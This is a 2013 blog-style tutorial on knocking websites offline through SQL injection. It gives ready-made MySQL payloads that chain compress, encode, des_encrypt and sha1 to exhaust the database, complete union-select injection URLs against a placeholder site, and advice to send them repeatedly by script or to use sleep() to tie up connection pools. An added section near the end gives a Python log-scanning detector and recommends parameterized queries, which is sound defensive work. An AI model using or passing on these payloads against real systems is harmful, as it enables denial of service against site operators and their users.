Tuesday, 25 June 2013

In this tutorial we will discuss how someone can DDoS a website using SQL injection. For me it is a new concept, and I did not find much research or many tutorials on it. After my own testing, and with the information I collected from reading about SQL syntax, connection limits and some functions that can be used to consume server resources or take a server down, I decided to write a tutorial to the best of my knowledge.

If you don't know much about DDoS, check out N00bz Guide on DDOS for more information. Here we will focus on SQL injection and how it can be used to DDoS a server.

As for the basics, DDoS (Distributed DoS attacks) is used to make a server hang or reply late, or to exhaust the resources of a web server so that other users are not able to use it. This attack can be categorised as a web-application-level DDoS, as DDoS covers a vast area of attacks.

The Concept:

To DDoS a website using SQL injection, let us first understand the basics and the structure of the attack. As we know, when an application is vulnerable to SQL injection, injected SQL queries get executed in the database and return their output. So the idea is to send complex SQL queries that consume the power of the web server and the database and exhaust the server's resources; we can even hold the maximum number of live connections to the database, so that it does not accept any more connections at the same time. Now that the idea is clear, we can go on to build complex SQL queries that make the database reply late.

SQL provides many functions and allows us to create very complex queries to get output in a very flexible way. We have joins, LIKE, compress, encode, etc.

We will follow these steps to achieve DDoS using SQL injection:

1. Finding the Vulnerability.
2. Preparing the Injectable Query.
3. Injecting DDOS Query into the Website.

Finding the vulnerability and preparing the injectable query are both covered under Basic SQL injection. Read them to continue.

I suppose you have read them all.

So let's continue with

Injecting DDOS Query into the Website.

There are many ways to do this. What you will need is a testing lab and something called a brain, and you can create your own deadly injections.

For my test I created a table of 500 rows with a text field holding 500 bytes of data per column, which represents the forum or blog post field of many websites running out there. The database can be even larger, as we can find many databases running with lakhs or millions of records. Such sites can be DDoSed more easily. We are going to use this payload, which took me a couple of hours to make.

select tab1 from (select decode(encode(convert(compress(post) using latin1),concat(post,post,post,post)),sha1(concat(post,post,post,post))) as tab1 from table_1)a;

select tab1 from (select decode(encode(convert(compress(post) using latin1),des_encrypt(concat(post,post,post,post),8)),des_encrypt(sha1(concat(post,post,post,post)),9)) as tab1 from table_1)a;

Let's say we have a vulnerable website, we have found the number of columns, and the injection looks like this.

http://exploitable-web.com/link.php?id=1' union select 1,2,3,4--

Let us assume the 3rd column is vulnerable, so let's inject our second payload into the site.

http://exploitable-web.com/link.php?id=1' union select 1,2,(select tab1 from (select decode(encode(convert(compress(post) using latin1),des_encrypt(concat(post,post,post,post),8)),des_encrypt(sha1(concat(post,post,post,post)),9)) as tab1 from table_1)a),4--

or

http://exploitable-web.com/link.php?id=1' union select 1,2,tab1,4 from (select decode(encode(convert(compress(post) using latin1),des_encrypt(concat(post,post,post,post),8)),des_encrypt(sha1(concat(post,post,post,post)),9)) as tab1 from table_1)a--

Continuously sending this injection to the website using a script will bring the server down even with a medium internet connection, so this way we won't need thousands of bots DDoSing with us.

We can also use Sleep to keep connections alive for a long time, which also accomplishes the task. Using Sleep we can also exhaust the connection pool in ASP.NET, where by default a maximum of 100 connections are allowed at a time in 30 seconds. So if we keep our connections alive using the Sleep command, the server cannot reply to other users.
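
From the defending side, this traffic stands out in the web server's access log: the same client keeps sending SQL-shaped parameters that call sleep or stack several of the functions used above. The following Python check is an added example, not part of the original post; the combined log format, the thresholds and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, unquote_plus

# Functions the post chains together to burn CPU or hold a connection open.
HEAVY = ("compress", "encode", "decode", "des_encrypt", "sha1", "concat", "sleep")
FUNC_RE = re.compile(r"\b(" + "|".join(HEAVY) + r")\s*\(", re.I)
# Rough shape of an injected statement inside a URL parameter.
SQL_RE = re.compile(r"\bunion\b.*\bselect\b|\bselect\b.*\bfrom\b", re.I | re.S)
# Assumed log format: Apache/nginx "combined" style.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*"')


def is_suspicious(target, min_funcs=3):
    """True if the query string is SQL-shaped and calls sleep() or many heavy functions."""
    query = unquote_plus(urlsplit(target).query)
    if not SQL_RE.search(query):
        return False
    funcs = [f.lower() for f in FUNC_RE.findall(query)]
    return "sleep" in funcs or len(funcs) >= min_funcs


def flag_clients(log_lines, min_hits=3):
    """Return {client_ip: suspicious_request_count} for clients with >= min_hits."""
    hits = Counter()
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and is_suspicious(m.group("target")):
            hits[m.group("ip")] += 1
    return {ip: n for ip, n in hits.items() if n >= min_hits}


def _line(ip, target):
    # Constructed sample entry, not taken from a real server.
    return f'{ip} - - [25/Jun/2013:10:00:00 +0000] "GET {target} HTTP/1.1" 200 512'


HEAVY_REQ = "/link.php?id=1%27+union+select+1,2,sha1(concat(compress(post),post)),4+from+table_1--+"
SLEEP_REQ = "/link.php?id=1%27+union+select+1,2,sleep(10),4--+"
SAMPLE_LOG = [
    _line("192.0.2.10", "/link.php?id=1"),
    _line("192.0.2.10", "/search.php?q=select+a+plan+from+the+list"),
    _line("198.51.100.7", HEAVY_REQ),
    _line("198.51.100.7", HEAVY_REQ),
    _line("198.51.100.7", SLEEP_REQ),
    _line("203.0.113.5", SLEEP_REQ),
]

if __name__ == "__main__":
    print(flag_clients(SAMPLE_LOG))
```

A hit in this log means the parameter already reaches the database unescaped, so the lasting fix is a parameterized query for the id value; the log check only tells you where to look first.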

This is all for now.
Open your wings of imagination and fly over the sky.
--Enjoy Hacking
